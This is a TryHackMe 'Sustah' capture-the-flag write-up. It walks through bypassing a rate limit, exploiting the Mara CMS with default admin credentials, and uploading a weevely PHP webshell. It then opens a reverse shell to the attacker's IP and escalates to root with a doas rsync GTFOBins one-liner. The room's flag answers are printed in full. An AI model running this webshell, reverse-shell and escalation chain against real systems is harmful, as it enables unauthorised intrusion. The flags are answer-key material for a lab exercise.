writeups

Sustah - Write-up - TryHackMe

noraj (Alexandre ZANNI)
, , , , , , ,
🇬🇧

Information

Room#

  • Name: Sustah
  • Profile: tryhackme.com
  • Difficulty: Medium
  • Description: Play a game to gain access to a vulnerable CMS. Can you beat the odds?

Sustah

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
$ sudo pacman -S ffuf weevely nmap pwncat gtfoblookup

Network enumeration#

Service scan with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.91 scan initiated Sat Jan 23 14:28:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.95.187
Nmap scan report for 10.10.95.187
Host is up (0.099s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
|   256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
|_  256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open  http    Gunicorn 20.0.4
| http-methods:
|_  Supported Methods: HEAD POST GET OPTIONS
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 23 14:29:23 2021 -- 1 IP address (1 host up) scanned in 74.06 seconds

There is a web service on port 8085.

HTTP discovery#

Let's look at http://10.10.95.187:8085/

There is a spinning wheel but we have only 0.004% chance of winning and there is also an input field.

The request looks like this.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: 10.10.95.187:8085
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.95.187:8085
Connection: close
Referer: http://10.10.95.187:8085/
Upgrade-Insecure-Requests: 1

number=10000

I tried to bruteforce the number but there is a rate limiting feature.

The answer headers look like that:

1
2
3
4
5
6
7
8
9
10
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Sat, 23 Jan 2021 14:05:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1004
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 8
X-RateLimit-Reset: 1611410771
Retry-After: 15

HTTP attack#

Let's check HackTricks - Rate Limit Bypass to change our IP origin using a HTTP header.

I observed that by adding X-Remote-Addr: 127.0.0.1 the X-RateLimit-xxx headers were removed from the answer.

Now we can try to bruteforce the number, I launched the BurpSuite Intruder and started from 10000 to 99999 with a 1 step, I stopped after a number return a 1136 byte answer instead of the 1166 one.

Answer: 10921

In the body of the answer we have a secret path.

Answer: /YouGotTh3P@th/

But browsing at this path just gives a 404 error.

Let's try on port 80 instead of 8085.

CMS identification#

Yay, it's a CMS overview page and the name of the CMS is in the footer.

Answer: Mara

We can consult /<path>/sitemap.php to see all existing pages.

By browsing /<path>/about.php we can find the installed version (7.2) but it's not the answer expected, I found another path with a changelog /<path>/changes.txt, this one contains the right version.

Answer: 7.5

Also at /<path>/lorem.php there a message:

Log in with admin and changeme to try the editor.

We can log in with the credentials at /<path>/lorem.php?login=admin.

File upload#

We can upload files at /<path>/codebase/dir.php?type=filenew.

Let's create a PHP webshell and upload it:

1
2
$ weevely generate noraj agent.php
Generated 'agent.php' with password 'noraj' of 761 byte size.

After upload we can see this message:

1
2
3
4
5
6
7
Processing file upload request...
Please be patient, may take a while.
Do not close this window whilst upload is in progress.
Destination : /var/www/html/<path>/img
OK: agent.php uploaded.
Files saved to: /var/www/html/<path>/img
All files processed successfully

So my webshell is available at: /<path>/img/agent.php.

And then we can access our webshell:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ weevely http://10.10.224.209/<path>/img/agent.php noraj

[+] weevely 4.0.1

[+] Target:     10.10.224.209
[+] Session:    /home/noraj/.weevely/sessions/10.10.224.209/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu-xenial:/var/www/html/<path>/img $

Webshell to system shell#

Let's upgrade into a system shell with weevely reverse shell module:

1
www-data@ubuntu-xenial:/var/www $ :backdoor_reversetcp -shell /bin/bash 10.9.19.77 9999

On the attacker machine:

1
2
3
4
5
6
7
8
9
$ pwncat -l 9999 -vv
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.224.209:60632 (family 2/IPv4, TCP)
bash: cannot set terminal process group (1220): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-xenial:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Elevation of Privilege (EoP): from www-data to kiran#

Right now we can't read the user flag:

1
2
3
4
5
6
7
8
www-data@ubuntu-xenial:/home/kiran $ ls -lhA
total 20K
-rw------- 1 kiran kiran    0 Dec  9 12:29 .bash_history
drwx------ 2 kiran kiran 4.0K Dec  9 04:31 .cache
drwxr-x--- 3 kiran kiran 4.0K Dec  6 18:08 .config
drwx------ 2 kiran kiran 4.0K Dec  6 18:09 .gnupg
-rw-r--r-- 1 kiran kiran  670 Dec  9 06:51 .profile
-r-------- 1 kiran kiran   33 Dec  9 11:07 user.txt

There is a hint saying to check for backups but for some reason the find command is forbidden.

I checked the backup directory

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@ubuntu-xenial:/var/www$ ls -lhA /var/backups
total 628K
-r--r--r-- 1 root root   1.7K Dec  6 13:19 .bak.passwd
-rw-r--r-- 1 root root    50K Dec  6 06:25 alternatives.tar.0
-rw-r--r-- 1 root root   6.2K Dec  9 06:46 apt.extended_states.0
-rw-r--r-- 1 root root    715 Dec  6 17:08 apt.extended_states.1.gz
-rw-r--r-- 1 root root    509 Nov 12 19:53 dpkg.diversions.0
-rw-r--r-- 1 root root    207 Dec  6 06:01 dpkg.statoverride.0
-rw-r--r-- 1 root root   535K Dec  6 06:19 dpkg.status.0
-rw------- 1 root root    849 Dec  6 06:17 group.bak
-rw------- 1 root shadow  714 Dec  6 06:17 gshadow.bak
-rw------- 1 root root   1.7K Dec  6 13:19 passwd.bak
-rw------- 1 root shadow 1.1K Dec  6 06:17 shadow.bak

The hidden backup permission seems wrong.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
www-data@ubuntu-xenial:/var/www$ cat /var/backups/.bak.passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:trythispasswordforuserkiran:/home/kiran:

We got credentials: kiran / trythispasswordforuserkiran. I'll try them over SSH.

Since we have a TTY reverse shell we can use su.

1
kiran@ubuntu-xenial:~$ cat user.txt

Answer: 6b18f161b4de63b5f72577c737b7ebc8

Elevation of Privilege (EoP): from kiran to root#

I tried a find command to enumerated SUID binaries but it didn't worked and which is weirdly unable to find the binary. Calling the absolute path and I get a permission denied.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
kiran@ubuntu-xenial:~$ find / -perm -4000 2>/dev/null

kiran@ubuntu-xenial:~$ which find

kiran@ubuntu-xenial:~$ /usr/bin/find -h
bash: /usr/bin/find: Permission denied

kiran@ubuntu-xenial:~$ ls -lh /usr/bin/find
-rwxr-xr-x+ 1 root root 217K Feb  7  2016 /usr/bin/find

kiran@ubuntu-xenial:~$ getfacl /usr/bin/find
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/find
# owner: root
# group: root
user::rwx
user:www-data:---
user:kiran:---
group::r-x
mask::r-x
other::r-x

So any user except www-data & kiran can use the binary.

By looking for a SUID binary manually I found there was doas in /usr/local/bin. So we can check the configuration in /usr/local/etc/doas.conf instead of /etc/doas.conf.

Doas is an alternative to sudo.

1
2
3
4
5
6
7
8
9
10
11
12
13
kiran@ubuntu-xenial:~$ ls -lh /usr/local/bin
total 68K
-rwsr-x--x 1 root root  38K Dec  6 17:13 doas
-rwxr-xr-x 1 root root  221 Dec  6 06:21 echo_supervisord_conf
-rwxr-xr-x 1 root root  211 Dec  6 06:17 flask
-rwxr-xr-x 1 root root  220 Dec  6 06:21 gunicorn
-rwxr-xr-x 1 root root  221 Dec  6 06:21 pidproxy
-rwxr-xr-x 1 root root  226 Dec  6 06:21 supervisorctl
-rwxr-xr-x 1 root root  224 Dec  6 06:21 supervisord
-rwxr-xr-x 1 root root 1.2K Dec  6 17:13 vidoas

kiran@ubuntu-xenial:~$ cat /usr/local/etc/doas.conf
 permit nopass kiran as root cmd rsync

I deployed and ran linpeas and it found the weak configuration too:

1
2
[+] Checking doas.conf
 permit nopass kiran as root cmd rsync

Basically we can run rsync as root.

So let's check an EoP on GTFObin:

1
2
3
4
5
6
7
$ gtfoblookup linux sudo rsync
rsync:

    sudo:

        Code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"'
              127.0.0.1:/dev/null

Let's go!

1
2
3
4
5
6
kiran@ubuntu-xenial:~$ doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt

Answer: afbb1696a893f35984163021d03f6095

Share